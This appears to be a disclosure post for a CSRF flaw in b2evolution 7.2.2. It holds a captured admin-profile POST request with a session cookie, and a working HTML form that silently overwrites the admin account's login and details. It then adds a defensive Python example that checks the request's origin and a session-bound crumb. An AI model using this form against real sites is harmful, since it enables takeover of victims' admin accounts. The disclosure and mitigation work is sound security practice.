Sunday, July 4, 2021

b2evolution 7.2.2 Cross Site Request Forgery

# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)
# Exploit Author: Alperen Ergel (@alpernae)
# Vendor Homepage: https://b2evolution.net/
# Software Link: https://b2evolution.net/downloads/7-2-2
# Version : 7.2.2
# Tested on: Kali Linux
# Category: WebApp

######## Description ########

Allows an attacker to change the details of the admin account (the form submits with no check that the request was made by the logged-in admin intentionally).

######## Proof of Concept ########

===> REQUEST <====

POST /b2evolution/evoadm.php HTTP/1.1
Host: s2.demo.opensourcecms.com
Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt;
__cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-
zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA;
_ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 1031
Origin: https://s2.demo.opensourcecms.com
Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile
Upgrade-Insecure-Requests: 1
Te: trailers
Connection: close

## < SNIP >

edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID=&edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D=&uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7=http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1

#### Proof-Of-Concept ####

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://s2.demo.opensourcecms.com/b2evolution/evoadm.php" method="POST">
<input type="hidden" name="edited_user_login" value="CHANGEHERE" />
<input type="hidden" name="edited_user_firstname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_lastname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_nickname" value="CHANGEHERE" />
<input type="hidden" name="edited_user_gender" value="M" />
<input type="hidden" name="edited_user_ctry_ID" value="233" />
<input type="hidden" name="edited_user_rgn_ID" value="" />
<input type="hidden" name="edited_user_subrg_ID" value="" />
<input type="hidden" name="edited_user_city_ID" value="" />
<input type="hidden" name="edited_user_age_min" value="" />
<input type="hidden" name="edited_user_age_max" value="" />
<input type="hidden" name="edited_user_birthday_month" value="" />
<input type="hidden" name="edited_user_birthday_day" value="" />
<input type="hidden" name="edited_user_birthday_year" value="" />
<input type="hidden" name="organizations[]" value="1" />
<input type="hidden" name="org_roles[]" value="King of Spades" />
<input type="hidden" name="org_priorities[]" value="" />
<input type="hidden" name="uf_1" value="I am the demo administrator of this site.
I love having so much power!" />
<input type="hidden" name="uf_new[2][]" value="" />
<input type="hidden" name="uf_new[3][]" value="" />
<input type="hidden" name="uf_2" value="https://twitter.com/b2evolution/" />
<input type="hidden" name="uf_3" value="https://www.facebook.com/b2evolution" />
<input type="hidden" name="uf_4" value="https://plus.google.com/+b2evolution/posts" />
<input type="hidden" name="uf_5" value="https://www.linkedin.com/company/b2evolution-net" />
<input type="hidden" name="uf_6" value="https://github.com/b2evolution/b2evolution" />
<input type="hidden" name="uf_7" value="http://b2evolution.net/" />
<input type="hidden" name="new_field_type" value="0" />
<input type="hidden" name="actionArray[update]" value="Save Changes!" />
<input type="hidden" name="crumb_user" value="zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl" />
<input type="hidden" name="ctrl" value="user" />
<input type="hidden" name="user_tab" value="profile" />
<input type="hidden" name="identity_form" value="1" />
<input type="hidden" name="user_ID" value="1" />
<input type="hidden" name="orig_user_ID" value="1" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
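Both the captured request and the PoC form carry a fixed crumb_user value, so the two server-side controls a defender wants on this profile-update handler are a same-origin check on Origin/Referer and a crumb that is bound to the victim's own session. The Python below is an added example, not b2evolution code; the HMAC crumb scheme, the server secret and the third-party origin are constructed assumptions.

```python
import hashlib
import hmac
from urllib.parse import parse_qs, urlparse

SITE_ORIGIN = "https://s2.demo.opensourcecms.com"  # origin of the install in the captured request


def issue_crumb(secret: bytes, session_id: str, ctrl: str) -> str:
    """Token tied to the session cookie and the controller it protects (constructed
    HMAC scheme for illustration, not b2evolution's own crumb format)."""
    return hmac.new(secret, f"{session_id}:{ctrl}".encode(), hashlib.sha256).hexdigest()


def session_from_cookie(cookie_header: str) -> str:
    """Pull session_b2evo out of the Cookie header; other cookies are ignored."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "session_b2evo":
            return value
    return ""


def same_origin(headers: dict) -> bool:
    """Accept a state-changing POST only when Origin (else Referer) is our own site."""
    src = headers.get("Origin") or headers.get("Referer")
    if not src:
        return False  # no provenance header at all: fail closed
    return "{0.scheme}://{0.netloc}".format(urlparse(src)) == SITE_ORIGIN


def csrf_verdict(headers: dict, body: str, secret: bytes) -> tuple:
    """Decide whether a POST to evoadm.php may update a profile; returns (allowed, reason)."""
    if not same_origin(headers):
        return False, "cross-site or missing Origin/Referer"
    params = {k: v[0] for k, v in parse_qs(body).items()}
    session_id = session_from_cookie(headers.get("Cookie", ""))
    if not hmac.compare_digest(params.get("crumb_user", ""), issue_crumb(secret, session_id, params.get("ctrl", ""))):
        return False, "crumb_user is not bound to this session"
    return True, "ok"


# Constructed sample data; SESSION and the replayed crumb are the values from the captured request.
SECRET = b"constructed-server-secret"
SESSION = "1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt"
BODY = "edited_user_firstname=Hacker&ctrl=user&user_tab=profile&user_ID=1&crumb_user={}"


def demo() -> list:
    cookie = f"session_b2evo={SESSION}; _ga=GA1.2.1294565572.1625137627"
    legit = {"Origin": SITE_ORIGIN, "Cookie": cookie}
    third_party = {"Origin": "https://attacker.example", "Cookie": cookie}  # constructed origin
    fresh = issue_crumb(SECRET, SESSION, "user")
    return [csrf_verdict(legit, BODY.format(fresh), SECRET),              # genuine edit: allowed
            csrf_verdict(third_party, BODY.format(fresh), SECRET),        # auto-submitted elsewhere: blocked
            csrf_verdict(legit, BODY.format("zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl"), SECRET)]  # stale crumb: blocked
```

Either control alone stops the form above: the Origin check rejects it before the body is read, and a session-bound crumb rejects the copied token even when the request arrives from the right origin.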